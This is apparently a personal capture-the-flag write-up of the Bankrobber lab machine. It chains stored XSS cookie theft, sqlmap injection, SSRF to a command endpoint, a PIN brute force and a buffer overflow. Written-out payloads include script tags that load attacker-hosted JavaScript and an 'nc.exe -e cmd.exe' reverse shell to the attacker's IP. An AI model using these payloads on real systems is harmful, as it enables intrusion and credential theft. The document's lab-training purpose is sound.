# BANKROBBER | 10.10.10.154

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.154
    
### Open Ports and Services

* 80 - HTTP - Apache 2.4.39 Win64 OpenSSL 1.1.1/b PHP 7.3.4
* 443 - HTTPS - Apache 2.4.39 Win64 OpenSSL 1.1.1/b PHP 7.3.4 
* 445 - SMB
* 3306 - mysql - MariaDB

## Services Enumeration

### 445 - SMB

This service is locked down and it leaks no info without credentials.

### 3306 - MYSQL

This service does not allow connections without creds either, and it also says my IP is not allowed to connect. That may mean I have to fiddle with the `/etc/hosts` file...

### 80/445 - HTTP(S)

This is a bitcoin website that allows you to create an account. When I do, the cookie that is set is simply my username and password, but base64 encoded:

![cookie](img/cookie.png)

When I transfer bitcoin (I choose an amount and an ID to send it to via a drop-down), there is a pop-up that informs me that an admin will review the transaction and decide to allow or reject it. This pop-up means there might be potential for XSS (cross-site scripting).

#### Trying XSS

This is yet another subject I know next to nothing about, so I looked up a writeup. I found this very compact code that can be used to grab cookies:

![cookie stealer](img/cookie-stealer.png)

I hosted that .js file using the python server, and then in the comment section of the transfer page I typed in the following code:

   `<script src="http://10.10.14.20:8000/fuck.js"></script>`
    
I had to hit the "TRANSFER E-COIN" button a few times, and wait a bit for anything to happen, but sure enough, my server got a couple of hits:

![stolen cookie](img/stolen-cookie.png)

The base64-encoded creds were also URL-encoded in this case, but I was able to decode to plaintext:

![admin-creds](img/admin-creds.png)

#### Logging in as admin

I was able to successfully use the creds to login, and there is a different menu up top on the `/admin` page:

![admin page](img/admin-page.png)

All the links were shortcuts to that same page, with different options that you can do as admin:

![admin options](img/admin-page2.png)

There I can see the bitcoin I have sent and can accept or reject the transactions. It is just for show however - as clicking on them doesn't do anything. Also it is interesting to note that navigating to this page does not trigger the XSS.

Searching for users shows there are just 3 users - admin, gio and myself. Trying the most basic SQL injection shows that there may be something to it:

![sql](img/sql.png)

I captured a search request in Burp and put it in a file called 'search.req', then ran `sqlmap -r <full/path/to/search.req>` to let it have a look, and it did find some injections:

![sqlmap](img/sqlmap.png)

Adding '--passwords' to the end of the command grabbed a password hash; throwing it into crackstation gave me the plaintext:

![hash](img/root-hash.png)

![mysql root password](img/root-pass.png)

Sqlmap can also be used to view the source code of PHP files that would not be otherwise accessible. From the nmap scan we see this Windows box is running xampp, which is Apache. The default root dir for xampp is "C:\xampp\htdocs".

    sqlmap -r /home/user/dox/oscp-prep/58-BANKROBBER/enum/search.req --file-read '/xampp/htdocs/<path/to/file>'
    
Looking at `index.php` and `/admin/search.php` didn't really tell me anything, except confirm a basic (and probably improper) use of SQL that makes things injectable.

Haven't checked the 'backdoorchecker' on the page yet. It says I can only do the 'dir' command, but when I try that I get this message back:

![backdoorchecker](img/backdoorchecker.png)

I can't run any command unless it comes from localhost. Maybe I should check out that file, which Burp confirms is at `/admin/backdoorchecker.php`.

![php](img/checker-php.png)

## Foothold via SSRF

I can understand this a bit. To run the checker, I need to be admin with the right cookie and hardcoded password (done), cannot use some forbidden characters (in this case - "$(" or "&"), and the request must come from localhost. As for how to do this, I have no clue, so I consulted the same writeup which again had an elegant solution, based largely on the cookie stealing script.

![sploit](img/sploit-js.png)

I have just put in code for powershell to execute a reverse shell payload coming from my machine. When I add the XSS code to the comment section, modified to point to the exploit:

    `<script src="http://10.10.14.20:8000/sploit.js"></script>`
    
Then it will execute the code in the js file, which will execute the `dir` command then my powershell command, hopefully getting me a reverse shell. I make sure to have a netcat listener running in addition to the web server:

![user shell](img/cortin-shell.png)

Success! Let's grab the flag:

![user flag](img/user-flag.png)

## User Enumeration

This is a Windows 10 Pro Machine without any hotfixes, according to `systeminfo`. Running `whoami /priv` shows me that this machine is running in the Dutch language, which could present problems. Winpeas gave me 9 potential CVEs this machine could be vulnerable to, but not much else.

Running `tasklist` found something, a program called 'bankv2.exe' which is certainly related to name of this box. 

![tasklist](img/bankv2.png)

I found it located at C:\. But I did not have permissions to copy it over to look at it. The PID is 1616 so maybe I can see if it listens on any ports.

![port 910](img/port-910.png)

Let's try connecting to it:

    nc.exe 127.0.0.1 910
    
![coin client](img/coin-client.png)

It prompts me for a PIN, and disconnects me when I inevitably get it wrong. But it lets me know there are only 4 digits, and they are probably numeric only. A brute force attack would work here, but doing it from that shell is risky, so a port forward is a good idea - that way I can do it from my machine.

### Chisel for port forwarding

Again this thing is new to me, and it shows I have a lot to learn. I grabbed binaries of chisel from the github - one for linux, one for windows, and I uploaded the windows version to the box. To enable the chisel server on my machine, I typed `sudo ./chisel server -p 9001 --reverse`.

Then, on the windows box I typed `chisel.exe client 10.10.14.20:9001 R:910:localhost:910` and I had the forward ready.

Now if I type `nc 127.0.0.1 910` on my machine I connect to the program just fine.

### Bruteforcing the PIN

Running the following python script makes short work of the PIN, also luckily because it is relatively early on (0021):

![script](img/brute.png)

Once I put in the PIN, it asks how much coin I want to transfer so I put in a ridiculously huge number and it actually didn't crash but instead overwrote a part of the program with the zeros.

### Confirming the overflow

So I generated 60 chars of rubbish using the MSF pattern_create tool - `pattern_create -l 60`; then pasted that into the app:

![junk](img/junkdata.png)

Then I grabbed the first 4 bytes of that and put it into pattern_offset - `pattern_offset -q 0Ab1 -l 60` and found that the offset is at 32 bytes. With this info I can overwrite the stack with the path to my own exe, in this case a netcat binary, and hopefully get a shell. Since this program is running as admin, my reverse shell should be privileged.

## Privilege Escalation via overwriting the stack?

I actually don't know exactly how this works, it seems like magic. I guess the name of the program that is supposed to get executed is actually stored in the stack, so if I can replace that name, it'll execute whatever I want.

I just need to generate 32 bytes of junk in front, and append the path to the netcat binary:

    python3 -c 'print("A" * 32 + "\\users\\public\\nc.exe -e cmd.exe 10.10.14.20 7777")'
    
Then I just need to paste the output of this into the right part, and it should execute the binary. Having a listener set up for port 7777 will catch the shell:

![root shell](img/root-shell.png)

### Flag

![root flag](img/root-flag.png)

## Conclusion

The most difficult box I have done so far, and I don't feel like I even accomplished anything. I did some of the stuff myself, but there were so many parts that I had no idea how to deal with them, that I pretty much just followed writeups. It is important for me to remember to not get impatient, and if a box stumps me, to walk away from it and do some research instead of taking the easy way out. Perhaps if I took my time I could have learned enough about XSS and SQL injection to get further.

Steps taken:

* Create user account, notice XSS
* Create malicious cookie-stealing script, get admin cookies
* Use SQLi to find source code for backdoorchecker.php
* Create another malicious .js to inject commands for a reverse shell
* Find vulnerable binary, bruteforce PIN
* Overwrite stack in binary with reverse shell command, get root shell
